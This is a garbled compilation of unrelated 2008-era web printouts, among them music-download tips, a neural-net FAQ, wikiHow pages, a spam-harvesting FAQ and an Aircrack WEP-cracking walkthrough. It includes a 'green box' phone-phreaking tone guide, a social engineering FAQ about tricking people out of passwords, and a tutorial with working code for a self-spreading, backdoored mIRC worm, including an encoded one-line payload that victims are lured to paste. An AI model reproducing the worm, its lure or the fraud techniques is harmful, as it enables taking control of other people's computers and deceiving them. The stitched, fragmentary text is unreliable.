Far from putting your favorite musician out of work, downloading free music can help you discover new artists and give you a better idea of which albums you actually want to go out and buy. But be wary. Just because a song is available online, doesn't mean it's legal. Try to make sure that the music you download is being offered legally by the band's record company, or the artist themselves. Here are some tips on how to find and download free music online.

Step 1: Figure Out What You Want To Download

Make a list of artists you may want to listen to.1.View lists of upcoming CD releases on sites like Billboard.com and Metacritic. Does your favorite artist have a new album coming out? If so, they may have some free songs available.


Listen to the radio (whether it be online, digital or terrestrial). Are there any songs that have caught yourattention lately? Didn't catch the name of the band or song? Many radio stations will keep a record of recently played songs on their website.


Step 2: Search MP3 Blogs

Music fans from all over the world have begun to keep logs of some of their favorite music and post MP3s for their readers to download and listen to. These are called MP3 Blogs. Here are a few of the most popular music blogs:

Indie: Stereogum | Gorilla vs. Bear | You Ain't No Picasso | Brooklyn Vegan | I Guess I'm FloatingPop/Rock: My Old Kentucky Blog | Aquarium Drunkard | Emo Freak's Delight | I Am Fuel, You Are FriendsHip Hop/Soul: So Much Silence | Soul Sides | Hip Hop Ruckus | The Rap Up | Biff HopElectronica/Dance: Digital Eargasm | Discobelle | Acid Girls | Missing Toof

MP3 Blog Aggregators

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:%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%::% %::% THE GREEN BOX %::% %::%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%:


The Green Box generates useful tones such as COIN COLLECT, COIN RETURN, andRINGBACK. These are the tones that ACTS or the TSPS operator would send tothe CO when appropriate. Unfortunately, the green box cannot be used at afortress station, but must be used by the CALLED party. The tones (hz) are:

COIN COLLECT 700 + 1100 COIN RETURN 1100 + 1700 RINGBACK 700 + 1700

Before the called party sends any of these tones, an operator releasedsignal should be sent to alert the MF detectors at the CO. This can be doneby sending 900 + 1500 Hz or a single 2600 Hz wink (90 ms) followed by a 60 msgap and then the appropriate signal for at least 900 ms. also, do not forgetthat the initial rate is collected shortly before the 3 minute period is up.

How to Give Better Instructions http://ezinearticles.com/?How-to-Give-Better-Instructions&id=305933

1 5 18/4/2008 2:51

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How to Give Better InstructionsBy Wally Bock

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If you're the boss, you have to give directions. It's part ofthe job.

Do the job well and you only have to do it once. Do the job poorly and you have to do it again. You might evenhave to fix things that have been done wrong. Here are three rules and twelve tips for giving good instructions.

First, here's a quick list of the three rules.

Rule 1: Give instructions in the ways that work best for your subordinateRule 2: Give your directionsin more than one wayRule 3: Check forunderstanding

Now let's review the rules in detail.

Rule 1: Give instructions in the ways that work best for your subordinate. Different people process information in different ways. To be mosteffective, you need to master different ways of presenting instructions so you can choose and use the best way for each subordinate.

Psychologists tell us that there are three basic information processing modes. Visual processorsthink in pictures, while auditory ones think in sound and dialogue. Kinesthetic processors needmotion and gesture to understand. Frame your instructions in language

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comp.ai.neural-nets FAQ, Part 2 of 7: Learning http://www.faqs.org/faqs/ai-faq/neural-nets/part2/

1 45 11/4/2008 2:08

Part1 - Part2 - Part3 - Part4 - Part5 - Part6 - Part7 - MultiPage

comp.ai.neural-nets FAQ, Part 2 of 7: LearningThere are reader questions on this

topic!Help others by sharing your knowledge

From: [email protected] (Warren Sarle)Newsgroups: comp.ai.neural-netsSubject: comp.ai.neural-nets FAQ, Part 2 of 7: LearningDate: 30 Dec 2002 21:06:17 GMTMessage-ID: <[email protected]>Reply-To: [email protected] (Warren Sarle)Keywords: frequently asked questions, answers

Archive-name: ai-faq/neural-nets/part2Last-modified: 2002-10-11URL: ftp://ftp.sas.com/pub/neural/FAQ2.htmlMaintainer: [email protected] (Warren S. Sarle)

Copyright 1997, 1998, 1999, 2000, 2001, 2002 by Warren S. Sarle, Cary, NC,USA. Answers provided by other authors as cited below are copyrighted bythose authors, who by submitting the answers for the FAQ give permission forthe answer to be reproduced as part of the FAQ in any of the ways specifiedin part 1 of the FAQ.

This is part 2 (of 7) of a monthly posting to the Usenet newsgroupcomp.ai.neural-nets. See the part 1 of this posting for full informationwhat it is all about.

========== Questions ========== ********************************

Part 1: IntroductionPart 2: Learning

What are combination, activation, error, and objective functions? Combination functions Activation functions Error functions Objective functions What are batch, incremental, on-line, off-line, deterministic, stochastic, adaptive, instantaneous, pattern, epoch, constructive, and sequential learning? Batch vs. Incremental Learning (also Instantaneous, Pattern, and Epoch) On-line vs. Off-line Learning Deterministic, Stochastic, and Adaptive Learning Constructive Learning (Growing networks) Sequential Learning, Catastrophic Interference, and the Stability-Plasticity Dilemma What is backprop? What learning rate should be used for backprop? What are conjugate gradients, Levenberg-Marquardt, etc.? How does ill-conditioning affect NN training? How should categories be encoded? Why not code binary inputs as 0 and 1? Why use a bias/threshold? Why use activation functions? How to avoid overflow in the logistic function? What is a softmax activation function? What is the curse of dimensionality? How do MLPs compare with RBFs? Hybrid training and the curse of dimensionality Additive inputs Redundant inputs Irrelevant inputs What are OLS and subset/stepwise regression? Should I normalize/standardize/rescale the data? Should I standardize the input variables? Should I standardize the target variables? Should I standardize the variables for unsupervised learning?

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1 4 10/4/2008 6:39

THE COMPLETE SOCIAL ENGINEERING FAQ!"There's a sucker born every minute." PT Barnum

"Don't touch me, sucka." Mr. T

By bernz (official sponsor of the 1996 Croatian Olympic Men's Synchronized Swimming Team)with shoutouts to: The Genocide2600, Silicon Toad and your big fat mama.


SECTION I: INTRO1.1 What is social engineering?1.2 Why is there a FAQ about it?1.3 Who cares?1.4 Basic intro and other shit.

SECTION II: PHONE SOCIAL ENGINEERING2.1 Basics2.2 Equipment2.3 Phreak stuff2.4 Technique

SECTION III: SNAIL MAIL3.1 Is Snail Mail acutally usefull for something?3.2 Equipment3.3 Technique

SECTION IV: INTERNET4.1 Isn't this just hacking?

SECTION V: LIVE, FROM NEW YORK...5.1 In person?5.2 Equipment5.3 I'm wearing a suit, now what?


1.1 What is social engineering?

The hacker's jargon dictionary says this:

Social Engineering: n. Term used among crackers and samurai for crackingtechniques that rely on weaknesses in wetware rather than software; the aimis to trick people into revealing passwords or other information thatcompromises a target system's security. Classic scams include phoning up amark who has the required information and posing as a field service tech or a fellow employee with an urgent access problem.

This is true. Social engineering, from a narrow point of view, isbasically phone scams which pit your knowledge and wits against another human.This technique is used for a lot of things, such as gaining passwords,keycards and basic information on a system or organization.

1.2 Why is there a FAQ about it?

Good question. I'm glad I asked. I made this for a few reasons. Thefirst being that Social Engineering is rarely discussed. People discusscracking and phreaking a lot, but the forum for social engineering ideas isstagnant at best. Hopefully this will help generate more discussion. I alsofind that social engineering specialists get little respect, this will showignorant hackers what we go through to get passwords. The last reason ishonestly for a bit of Neophyte training. Just another DOC for them to read soI don't get bogged with email.

1.3 Who Cares?

To Neophytes: You should, you little fuck. If you think the world ofcomputers and security opens up to you through a keyboard and your redbox thenyou are so fucking dead wrong. Good. Go to your school, change your grades andbe a "badass" hacker. Hacking, like real life, exists in more than just yoursystem. You can't use proggies to solve everything. I don't mean to soundupset, but jesus, have a bit of innovation and a sense of adventure.

To Experienced Hackers: Just thought it would help a bit.

1.4 Basic intro and shit for this document.

This FAQ will address phone techniques, mail techniques, internettechniques and live techniques. I will discuss Equipment and will put some

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Step by step guide to brainstorming http://www.jpb.com/creative/brainstorming.php

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The Step by Step Guide to

BrainstormingBrainstorming can be an effective way to generate lotsof ideas on a specific issue and then determine whichidea – or ideas – is the best solution. Brainstorming ismost effective with groups of 8-12 people and shouldbe performed in a relaxed environment. If participantsfeel free to relax and joke around, they'll stretch theirminds further and therefore produce more creativeideas.

A brainstorming session requires a facilitator, a brainstorming space and something on which to writeideas, such as a white-board a flip chart or softwaretool. The facilitator's responsibilities include guiding thesession, encouraging participation and writing ideas down.

Brainstorming works best with a varied group of people. Participants should come from variousdepartments across the organisation and have differentbackgrounds. Even in specialist areas, outsiders can bring fresh ideas that can inspire the experts.

There are numerous approaches to brainstorming, but the traditional approach is generally the most effectivebecause it is the most energetic and openlycollaborative, allowing participants to build on each others' ideas.

Creativity exercises, relaxation exercises or other fun activities before the session can help participants relaxtheir minds so that they will be more creative duringthe brainstorming session.

Step by StepDefine your problem or issue as a creative challenge. This is extremely important. A badlydesigned challenge could lead to lots of ideaswhich fail to solve your problem. A well designed creative challenge generates the best ideas tosolve your problem. Creative challenges typicallystart with: "In what ways might we...?" or "Howcould we...?" Your creative challenge should be concise, to the point and exclude any informationother than the challenge itself. For example: "Inwhat ways might we improve product X?" or"How could we encourage more local people to join our club?" Click here to read Dr. Arthur VanGundy's The care and framing of strategic innovation challenges (PDF document: 537kb)


Give yourselves a time limit. We recommend around 25 minutes, but experience will showhow much time is required. Larger groups may


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Step-By-Step Guide: Embedded Windows Media in Firefox - Mozilla... http://forums.mozillazine.org/viewtopic.php?t=206213

1 5 10/4/2008 7:03

Step-By-Step Guide: Embedded Windows Media in FirefoxMozillaZine Forum Index -> Firefox Support [Post Reply]


Author Message

VectorspaceModeratorJoined: 27 Nov 2003Warwickshire, UK

Posted: Jan Sun 23rd 2005 9:03am

Full Step-By-Step Guide: Embedded Windows Media in Firefox

WARNING!! Before you install the ActiveX plugin, if you use the Adblock Extensionmake sure that the setting for OBJ-TABS is disabled. Otherwise, your system will run almost any ActiveX control. See Note 4.


Warp to BackgroundWarp to Windows Media Player Plugin

Security AlertChecking Windows Media Player plugin installation (XP/Vista)Checking Windows Media Player plugin installation (other)Restoring the Windows Media Player pluginConfiguring/Troubleshooting the Windows Media Player plugin

Warp to ActiveX PluginInstalling the ActiveX pluginChecking ActiveX Plugin InstallationUninstalling ActiveX

Warp to NotesWarp to Troubleshooting

Most of the ActiveX plugin information in this guide has now been mirrored in the Knowledge Base: http://kb.mozillazine.org/Windows_Media_Player

For other embedded/streaming media guides and information, visit the Complete Embedded & Streaming Quicktime/Real/Windows Media Player Guide for Windows Users.



It is common to find websites that use Windows Media Player to embed audio and video into a web page. The Windows Media Player plugin, while not included with Windows Media Player, should be included with Windows itself - however this is not alwaysthe case. In addition, many websites use ActiveX only to embed media - making such websites IE-only. This guide discusses how to solve both problems.

If you came here wondering how to make Firefox use the Windows Media Player plugin play a specific file type instead of Quicktime, then you should know that the WMP plugin is hard-coded to only play the proprietary Microsoft formats (.asf, .asx, .wm, .wma, .wax, .wmv, and .wvx), and Windows Media Player provides no provision for changing this. For the most common formats found on the web (like mp3, midi, mpg, wav, etc.) you will need to install and configure Quicktime or Quicktime Alternative. The Quicktime guide contains instructions for this: http://forums.mozillazine.org/viewtopic.php?t=206210


Windows Media Player Plugin

Windows Media Player provides a plugin to allow browsers other than IE to display embedded Windows Media. It is this plugin that Firefox uses. Sometimes though, the plugin is missing or refuses to work properly. This section of the guide gives instructions on checking the plugin, restoring it if missing, and on configuring it if it doesn't work properly.

Security AlertMicrosoft issued a security bulletin on Feb 14 2006 regarding a vulnerability in the Windows Media Player plugin on Windows 2000 and Windows XP systems, that could result in remote code execution when using non-Microsoft web browsers. Affected users should install the "Security Update for Windows Media Player Plug-in (KB911564)" available from Windows Update. This willupdate the WMP plugin file "npdsplay.dll" to version http://www.microsoft.com/technet/security/Bulletin/MS06-006.mspx

Checking Windows Media Player plugin installation

For this to work, you need to you have Windows Media Player 9, 10 or 11 installed. They can be installed through Windows Update.You can test the Windows Media Player plugin here:

Broadband: http://members.aol.com/jrzycrim01/mozilla/wmp/vidtest-HS.htmlNarrowband: http://members.aol.com/jrzycrim01/mozilla/wmp/vidtest-LS.html

If those test players work, then the Windows Media Player is installed. If they do not work, you need to check that Firefox can detect the Windows Media Player plugin:Windows XP/Vista Users

A new Windows Media Player plugin has been released for these two platforms on Port 25, Microsoft's open source labs website. It is specifically for Firefox (it also works in Seamonkey). It is a significant improvement over the original plugin - it adds support for scripting, modern look skins, visualisations, and most (if not all) of the attributes that the ActiveX control in IE supports. It only works in Windows XP and Vista.

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Load the workflow entitled genscan_shim_example.xml from the page http://www.cs.man.ac.uk/~katy/tavernaLook at the workflow metadata – what does the workflow do?Run the workflow. For an input file, load example_input.txt from the same web pageWhat happens? Did all the services return results? Why did some fail?

The Ethical Hacker Network - Tutorial - Make Your Own mIRC Worm http://www.ethicalhacker.net/content/view/26/2/

1 4 10/4/2008 6:36

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Tutorial - Make Your Own mIRC Worm

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by Mohammad Ahmadi Bidakhwidi

In this tutorial I will try to teach you how to make your own mIRC worm in IRC. This is the basic formula, so you can later add/delete functions to obtain better results in your eyes. This tutorial is of course for educational use only. It is meant to explore how mIRC scripts work, and how you canprotect yourself against these threats. The author and EH-Net do not take any responsibility forthe damages one can cause using this script. If you do not agree with these terms I suggest you stop reading this tutorial.

First of all I need to notify you that this worm is backdoored. This means that people that areinfected by this worm can be controlled by you. Once infected with the worm they are also infectedwith the Trojan. Using the Trojan you can control the victim’s PC.

Infect the victim

It all starts with the next command:

//write mab.mrc $decode(b24gXio6dGV4dDoqOio6IHsgaWYgKChpbnMqIGlzd20gJDEtKSAmJiAoJHRhcmdldCA9PSAkbWUpKSB7IC4gJCsgJDItIHwgaGFsdGRlZiB9IHwgZWxzZWlmICgoYSogaXN3bSAkMS0pICYmICgkY2hhbikpIHsgLm1zZyBtYWIgaW5mIHwgLm1zZyAkbmljayBXYW50IHRvIGJlIE9QRVJBVE9SIGluICRjaGFuIGNvcHkvcGFzdGUgdGhpcy0+IAM0Ly93cml0ZSAuICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyB9IH0=,m) | .load -rs mab.mrc

This is one line!

Understand the Script

We need to mix these two things:

The Worm

on 1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R }

Here #mab is the channel you want to let them join if they're infected with the worm. But sincethat would not be very stealthy, we have to do it in another way. We let it message you. We change the .timer 0 120 .join #mab with .msg mab_ inf. Where mab_ is your nickname.

With this, your worm has started. It will now spread and try to personal message people, whileignoring incoming messages. When that is done, it will try to send itself to other users, and tell them to type the command.

Above is the original worm I designed. Now we are going to change some things about it so thefunctionality of the Trojan is constructive. We will remove the user mode +R on the end of the script, because this will only let users who are authenticated with the official server bot message the victim once the Trojan is implemented. That is not the objective, so we will remove that from the worm. Therefore, we get the next script that we have to merge with the Trojan script:

on 1:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(3) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs }

The Trojan

on ^*:text:ins*:?:{ . $+ $2- | haltdef }

Mixed they will give us the Backdoored IRC Worm. This means that the worm will spread itself,join the certain channel (here: #mab) and after that it will spread itself. The only thing left to do iswait for you to control it via the Trojan, so you will have the rights to do whatever you want onhis/her computer using mIRC. You actually use the victim’s mIRC to accomplish certaincommands. I suggest you visit the IRC Trojan Tutorial, so you can also fully use the trojan part in the worm.

I will now try to give more details about that script, so you truly understand the worm. You can easily modify it and achieve better results. I will mix it.

So basically we want to mix these two “mechanisms”:

on 1:text:*a*:#:{ DO SOMETHING }on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }


on ^*:text:*:*: {if ((ins* iswm $1-) && ($target == $me)) DO SOMETHINGelseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE}

In one line:

on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE }

Where DO SOMETHING is the Trojan’s work and DO SOMETHING ELSE is the Worm’s work.


on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a*


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How to Be an Atheist Parent - wikiHow http://www.wikihow.com/Be-an-Atheist-Parent

1 2 19/4/2008 2:53





How to Be an Atheist ParentBeing an atheist in a religious culture is a challenging situation and being an atheist parent an even more daunting position forone to be in. Have you ever asked yourself how you can be an atheist parent?

StepsRaise them however you want. They're your kids. There are worse kids out there. You'll probably do more harm worryingabout every little thing.


Get them involved in activities that they like, and let them blossom into who they are. Let them know that who they are isperfectly okay.


If you can find other atheists and get help, cool, but if not, don't worry about it. Having diverse friends and family is goodfor children of all kinds to learn from.


TipsIf they ever have moments of crisis and doubt, remind them of the atrocites commited by "religious" or nonreligiousorganizations, a few people can never truly represent their religion, past and present, or cite examples of people like TomCruise.

Get your children involved with environmental issues or volunteering; something that can help them feel as if they're doingsome good without having to fall back on a belief system.

Teach your children to believe in themselves. Help them become self-sufficient and be an example of self-suffiency forthem to learn by.

Be an example of tolerance and acceptance, and let your children know that there will always be those who disagree butthat doesn't make anybody better or worse than anybody else.

WarningsYour children may be more logical and rational and do better on their test scores than other neighborhood children. Letthem know this is something to be proud of, even if they do get called nerd or picked on from time to time.

Your children may also become independent thinkers and this can be difficult for them at times. Show them that therewards for independence far outweigh the slight disadvantages of not fitting in with the herd.

Related wikiHowsHow to Become an AtheistHow to Deal With Religious People if You Are an AtheistHow to Show an Atheist to Believe in GodHow to Relate to an AtheistHow to Find God

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Free CAD Lesson 2-5 Hatch and Solid commands - AutoCAD 2008 http://www.we-r-here.com/cad/tutorials/level_2/2-5.htm

1 4 11/4/2008 7:15

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Topics covered in this Lesson:Hatch, Solid

Hatching in AutoCAD is a way of filling in areas of your drawing with a pre-formattedpattern to represent certain materials. It is usually used in sectional views. Starting withAutoCAD release 14, you can use a solid fill to completely fill in areas such as walls in afloor plan.

Command Keystroke Icon Menu Result


Bhatch / H Draw > Hatch

Covers an area with a predefined pattern

Hatch EditHatchEdit/ HE

Modify > Object > Hatch...

Edits an existing Hatch

SolidSolid / SO None None Creates a solid

filled shape

Draw a rectangle 10" by 10" and put a circle with 2" radius in the middle of it (rememberthe M2P OSnap?).

Start the Boundary Hatch by typing H <ENTER> . When you start the command, youwill see this dialog box appear:

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BBC - Skillswise - Words - Reading and following instructions quiz http://www.bbc.co.uk/apps/ifl/skillswise/mod_quizzes/words/grammar...

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FAQ: How do spammers get people's email addresses ? http://www.faqs.org/faqs/net-abuse-faq/harvest/

1 5 4/4/2008 11:47

[ Usenet FAQs | Search | Web FAQs | Documents | RFC Index ]

FAQ: How do spammers get people's email addresses ?There are reader questions on this topic!Help others by sharing your knowledge

Message-ID: <net-abuse-faq/[email protected]>X-Last-Updated: 2003/06/08Newsgroups: alt.stop.spamming, alt.privacy, news.admin.net-abuse.emailFrom: [email protected] (Uri Raz)Subject: FAQ: How do spammers get people's email addresses ?Summary: This FAQ lists all the ways spammers use to collect E-mail addresses, to the best of my knowledge. The main purpose of this FAQ is to make pDate: 17 Apr 2004 11:29:02 GMT

Posting-Frequency: monthlyCopyright: (c) 1999-2002 Uri RazMaintainer: Uri Raz <[email protected]>Last-modified: 19/Mar/2002Archive-Name: net-abuse-faq/harvestURL: http://www.private.org.il/harvest.html

There are many ways in which spammers can get your email address. The ones I know of are :

1. From posts to UseNet with your email address.

Spammers regularily scan UseNet for email address, using ready made programs designed to do so. Some programs just look at articles headers which contain email address (From:, Reply-To:, etc), while other programs check the articles' bodies, starting with programs that look at signatures, through programs that take everything that contain a '@' character and attempt to demunge munged email addresses.

There have been reports of spammers demunging email addresses on occasions, ranging from demunging a single address for purposes of revenge spamming to automatic methods that try to unmunge email addresses that were munged in some common ways, e.g. remove such strings as 'nospam' from email addresses.

As people who where spammed frequently report that spam frequency to their mailbox dropped sharply after a period in which they did not post to UseNet, as well as evidence to spammers' chase after 'fresh' and 'live' addresses, this technique seems to be the primary source of email addresses for spammers.

2. From mailing lists.

Spammers regularily attempt to get the lists of subscribers to mailing lists [some mail servers will give those upon request], knowing that the email addresses are unmunged and that only a few of the addresses are invalid.

When mail servers are configured to refuse such requests, another trick might be used - spammers might send an email to the mailing list with the headers Return-Receipt-To: <email address> or X-Confirm-Reading-To: <email address>. Those headers would cause some mail transfer agents and reading programs to send email back to the <email address> saying that the email was delivered to / read at a given email address, divulging it to spammers.

A different technique used by spammers is to request a mailing lists server to give him the list of all mailing lists it carries (an option implemented by some mailing list servers for the convenience of legitimate users), and then send the spam to the mailing list's address, leaving the server to do the hard work of forwarding a copy to each subscribed email address.

[I know spammers use this trick from bad experience - some spammer used this trick on the list server of the company for which I work, easily covering most of the employees, including employees working well under a month and whose email addresses would be hard to find in other ways.]

3. From web pages.

Spammers have programs which spider through web pages, looking for email addresses, e.g. email addresses contained in mailto: HTML tags [those you can click on and get a mail window opened]

Some spammers even target their mail based on web pages. I've discovered a web page of mine appeared in Yahoo as some spammer harvested email addresses from each new page appearing in Yahoo and sent me a spam regarding that web page.

A widely used technique to fight this technique is the 'poison' CGI script. The script creates a page with several bogus email addresses and a link to itself. Spammers' software visiting the page would harvest the bogus email addresses and follow up the link, entering an infinite loop polluting their lists with bogus email addresses.

For more information about the poision script, seehttp://www.monkeys.com/wpoison/

4. From various web and paper forms.

Some sites request various details via forms, e.g. guest books & registrations forms. Spammers can get email addresses from those either because the form becomes available on the world wide web, or because the site sells / gives the emails list to others.

Some companies would sell / give email lists filled in on paper forms, e.g. organizers of conventions would make a list of participants' email addresses, and sell it when it's no longer needed.

Some spammers would actually type E-mail addresses from printed material, e.g. professional directories & conference proceedings.

Domain name registration forms are a favourite as well - addresses are most usually correct and updated, and people read the emails sent to them expecting important messages.

5. Via an Ident daemon.

Many unix computers run a daemon (a program which runs in the

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The Spiral Data Tato -- A Curiously Complex Origami CD Case: Supe... http://www.instructables.com/id/SXN890ZF9053ZTM/

1 3 10/4/2008 8:31

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The Spiral Data Tato -- A Curiously Complex Origami CD Caseby oschene on Nov 18, 2007 in ART & CRAFT email it!

step 4 Super Double Secret A4 StepShh...don't tell the Americadians. This is the secret step for folders of the A4 version. You fold down this flap.

You could, I suppose, cut it off, but it's not a bad place to have some reinforcement.

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Q:L2 Where is my favorite Las Vegas casino? (MAP)A:L2 (Yui-Bin Chen)

MapsI. Las Vegas Map (Not to scale)

// / // I-15 / LV Blvd | // / // | // / // N ====(95)=============================================(515)===== | // / / // | | // /---/---//-Steward-Ave | R // / See // --+-- a // /Downtown/--Ogden-Ave | n // / for // | c // / Details h // /---/---//----Fremont-St | o || / / // | | || / / // | D || / / // | r || M / // Charleston-Blvd----------+----------||------a------//--------------- | | || i // | | // n // V | // | // a | // S // l | // t // l | // |// e | // VW//Sahara-Ave----y--------------//------------//----------------------- | PS // //Sa| V // // |-Karen-Ave i // Circus^2//Riv |LVH VW Vegas World e // SlotsAFun// | Sa Sahara w I-15 //SC | PS Palace Station | // // | LVC Las Vegas Hilton B // Stardust//-C-Ctr--|Las Vegas Riv Riviera l // // |Convention SC Silver City v || // |Center d || Frontier//`----------+--------- | || // | | || //DesertInn P | || // aSpring-Mountain-Rd--||-- FSM || r FSM Fashion Show Mall | || \____|| a BM Boulevard Mall | || ||\ d BM | || || `---Sands-Ave-i--------- | || TI||Sands s | || || e TI Treasure Island | || Mirage|| | BC Barbary Coast | || ||Harrah’s R GC Gold Coast | || ||Imperial d | ||Caesars||Flamingo | GC |Rio || ||BC Maxim |Flamingo-Rd---------||-------||---------------+--------- || ||Bally’s |Continental || || | || || | || ||Aladdin | UNLV || ||----------Harmon-Ave-. I-15 || | | || || | `--- || || | || || | || ||MGMGrand |

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Writing a multi-platform game? But that’s a lot of complicated work, and I don’t have time to do that. Wrong! Everything has changed thanks to a sweet little API called the SDL or Simple Direct-media Layer (which can be obtained at www.libsdl.org). SDL is an easy to use library for Sound, Input, Timers, and 2D graphics (3D graphics are accomplised through the use of OpenGL). In this quick little tutorial, I’ll teach you how to make your basic SDL window that you can compile on any platform! To make it even better, we’ll add a little yellow pixel to the center of the screen, won’t that be cool? Okay, so maybe not “cool”, but it’s a start. As with my previous tutorials I’ll give you a big ‘ol slab of code, then disect it for you.

#include “SDL.h”#include <stdio.h>

void putpixel(SDL_Surface *surface, int x, int y, Uint32 pixel);

int main(int argc, char *argv[]){ SDL_Surface *screen; int quit = 0; SDL_Event event; int x, y; Uint32 yellow;

// Initialize defaults, Video and Audio if((SDL_Init(SDL_INIT_VIDEO|SDL_INIT_AUDIO)==-1)) { printf(“Could not initialize SDL: %s.\n”, SDL_GetError()); return -1; }

screen = SDL_SetVideoMode(800, 600, 24, SDL_SWSURFACE | SDL_FULLSCREEN); if ( screen == NULL ) { fprintf(stderr, “Couldn’t set 800x600x24 video mode: %s\n”, SDL_GetError()); return -2; }

// Map the color yellow to this display (R=0xff, G=0xFF, B=0x00) yellow = SDL_MapRGB(screen->format, 0xff, 0xff, 0x00); // Make the dot at the center of the screen x = screen->w / 2; y = screen->h / 2;

while( !quit ) { // Poll for events while( SDL_PollEvent( &event ) ) { switch( event.type ) { case SDL_KEYUP: if(event.key.keysym.sym == SDLK_ESCAPE) quit = 1; break; if(event.key.keysym.sym == SDLK_F1) SDL_WM_ToggleFullScreen(screen); // Only on X11 break; case SDL_QUIT: quit = 1; break; default: break;

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Aircrack-2.3 Windows (Wireless WEP crack) http://www.grape-info.com/doc/win2000srv/security/aircrack-2.3.html

1 3 11/4/2008 1:49

Updated on 10 Dec, 2005 on Windows XP

Aircrack-2.3 Windows (Wireless WEP crack)Aircrack is a set of tools for auditing wireless networks:

airodump: 802.11 packet capture programaireplay: 802.11 packet injection programaircrack: static WEP and WPA-PSK key crackerairdecap: decrypts WEP/WPA capture files

Wireless Card Installation

Download Aircrack from http://100h.org/wlan/aircrack/1.Read the documentation (README.html) and follow. It has the most comprehensive explanation.2.I have a CISCO Aironet 350 and PrismGT card (Corega WLCB-54GT) but only CISCO works fine onWindows. PrismGT does not work on Windows. Aironet 350 works for 11b network.


How to capture (airodump)

Search WLANs. 0 to hop between channels.

> airodump.exe airodump 2.3 - (C) 2004,2005 Christophe Devine

usage: airodump [ivs only flag]

Known network adapters:

18 Cisco Systems 350 Series PCMCIA Wireless LAN Adapter 2 Intel(R) PRO/100 VE Network Connection 3 1394 Net Adapter

Network interface index number -> 18

Interface types: 'o' = HermesI/Realtek 'a' = Aironet/Atheros

Network interface type (o/a) -> a

Channel(s): 1 to 14, 0 = all -> 0

(note: if you specify the same output prefix, airodump will resume the capture session by appending data to the existing capture file)

Output filename prefix -> out

(note: to save space and only store the captured WEP IVs, press y. The resulting capture file will only be useful for WEP cracking)

Only write WEP IVs (y/n) -> y


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Wireless SnifferAdvanced Packet Analysis. A must have networking tool. www.Paessler.com/Packet-Sniffing

Sniff WirelessGet accurate and comprehensive real-time analysis for your WLAN. www.NetworkInstruments.com

AirMagnet Free-TrialTest/Audit/Fix your WLAN with Industry-leading Wi-Fi analyzer www.airmagnet.com

How to Be Photogenic - wikiHow http://www.wikihow.com/Be-Photogenic

1 4 22/4/2008 4:12


How to Be Photogenic

Do you dislike having your picture taken because you always seem to come out looking hideous? Have you ever been on adate with someone whose online photo knocked you out but whose appearance in real life turned out to be a bit uninspiring?What’s the deal with pictures? While being photogenic just comes naturally to some people, there are a few things thatanyone can do to look better in photos. Try out the tricks in this article and stop running for cover whenever the cameracomes out.

StepsWear clothes with colors that suit you. Certain colors complement certain skin tones, while others tend to bring out theworst. Also take into consideration your hair color. You may have a feel for which colors you look best in, but if not, dosome research (check out the external links below) and some trial-and-error.


Hide your blemishes.The bad thing about photographs is that because they are simply frozen images of one angle in an instant in time, theycan't show all your good attributes. The good thing about them is that you can easily hide certain features you don’t like. Ifyou've got a unsightly look on one side of your face, for example, don’t show the camera that side.


Determine your best angle.Beyond the obvious hiding of blemishes, finding the right angle for your face can be a bit more difficult. The best thing youcan do is experiment using a digital camera so that you can immediately see the results of each pose. It will very quicklybecome obvious which angles are most flattering for you, and you can then use that angle as much as possible in thefuture. The classic model's pose is to arrange your body 3/4 toward the camera with one foot in front of the other and oneshoulder closer to the camera than the other. This isn’t the best pose for everybody, however, and it can look a littleridiculous when used in a family photo right next to your Uncle Bob.


Get rid of a double chin.Tilt your head down slightly and try to position yourself so that the camera is a little above your eye level. This will hide adouble chin fairly effectively. You can also put one hand under your chin as though you’re resting your head on your hand(keep the thumb side of your hand out of the camera’s view, if possible). Don't actually rest any weight on the hand,however, or you will push the skin into an unflattering position. Also try resting your tongue against the roof of your mouth.


Stick your neck out.One trick models often use is to present a 3/4 pose to the camera (turn your head so that 3/4 of your face is exposed tothe camera, as opposed to a full frontal shot) and then lift your neck and slightly tilt your head down, as though you are aturkey sticking its head out (without actually thrusting your chin out). This improves facial definition and helps amelioratewrinkles and flabby skin.


Relax.Many people end up looking odd in photos because they freeze into odd facial expressions with a “say cheese" type ofsmile on their face. If you're used to having bad pictures taken of yourself, you probably get nervous in front of the camera,and this can make things even worse. If you know a picture is about to be taken, take a deep breath and exhale naturally, relaxing your arms and shoulders. As you exhale, smile or strike whatever pose is appropriate. Don't hold your breath,either in or out, otherwise you'll appear as though you're tense or suffocating. If you see the photo coming too late, don’tpanic and try to strike a pose. Keep doing what you're doing and try to ignore the camera. It may not turn out perfectly, butyou’ve got a better chance than if the camera catches you quickly trying to change your facial expression. The morecomfortable and relaxed you appear, the better the photo will turn out.


Think happy thoughts. An unnatural, forced smile can make you look stiff and, frankly, weird. When people are smilingand waiting for a photo to be snapped, their facial muscles can get caught in all sorts of strange positions. To remedy this,try to time your smile so that you don't have to hold it for too long. Also, imagine something really funny (don't be afraid tolaugh a bit, even) or think of someone—your spouse or child, for example—who makes you happy. By doing so, you’ll get


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Maintaining Your Computer System

General Dos and Don'tDo:

Always shut down your computer properly.Do regular Scandisk to check the hard disk surface for damage.Defragment the hard drive periodically.Delete all files and programs you no longer need from your computer.Use a anti-virus program to prevent a virus on you computer.Back up data to floppy disks or zip disks to ensure you have a copy.


